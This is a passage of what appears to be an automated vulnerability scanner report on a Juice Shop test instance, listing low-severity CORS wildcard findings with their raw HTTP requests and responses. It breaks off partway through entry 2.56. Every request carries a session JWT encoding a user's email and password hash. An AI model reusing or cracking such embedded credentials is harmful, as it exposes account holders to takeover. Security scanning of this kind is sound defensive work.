X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:02 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.45. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://luszyxfylxyr.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static page such as the application shell this response turns out to be, the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Note also that no such file exists: the path is a bower_components script reference resolved relative to /public/images/products/ (the real libraries are served from /bower_components/, see entries 2.31 to 2.35 above), and the response is the Angular application shell (Content-Type text/html, 9785 bytes, ETag W/"2639-15942f0cef8"), evidently the catch-all answer for unknown paths. The CORS observation therefore duplicates the one for the shell itself, and this path should not be counted as a separately affected resource.

Request 1

GET /public/images/products/bower_components/angular-bootstrap/ui-bootstrap.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://luszyxfylxyr.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:20 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.46. http://192.168.61.143:3000/public/images/products/bower_components/angular-cookies/angular-cookies.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-cookies/angular-cookies.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://stcoafegahmb.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-cookies/angular-cookies.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://stcoafegahmb.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:23 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.47. http://192.168.61.143:3000/public/images/products/bower_components/angular-qrcode/angular-qrcode.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-qrcode/angular-qrcode.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://wjhgybwzwwmi.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-qrcode/angular-qrcode.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://wjhgybwzwwmi.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:25 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.48. http://192.168.61.143:3000/public/images/products/bower_components/angular-route/angular-route.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-route/angular-route.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://vizstoizpqzw.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-route/angular-route.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://vizstoizpqzw.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:35 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.49. http://192.168.61.143:3000/public/images/products/bower_components/angular-socket-io/socket.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-socket-io/socket.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://pmeuzefgunue.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-socket-io/socket.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://pmeuzefgunue.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:48 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.50. http://192.168.61.143:3000/public/images/products/bower_components/angular-touch/angular-touch.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-touch/angular-touch.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://mpsplsduixtx.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-touch/angular-touch.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://mpsplsduixtx.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:53 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.51. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://vddqfhikdrad.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://vddqfhikdrad.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:05 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.52. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate/angular-translate.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-translate/angular-translate.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://azlpvdpjmbuc.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-translate/angular-translate.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://azlpvdpjmbuc.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:56 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.53. http://192.168.61.143:3000/public/images/products/bower_components/angular/angular.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular/angular.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://ffthyazhkpgp.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular/angular.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://ffthyazhkpgp.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:16:47 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.54. http://192.168.61.143:3000/public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://ocelkszhvwbg.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://ocelkszhvwbg.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:19 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.55. http://192.168.61.143:3000/public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://xsfisuoicwpc.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/bootswatch/slate/bootstrap.min.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://xsfisuoicwpc.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:28 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.56. http://192.168.61.143:3000/public/images/products/bower_components/clipboard/dist/clipboard.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/clipboard/dist/clipboard.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://imqacakvjjsj.com.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/clipboard/dist/clipboard.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://imqacakvjjsj.com
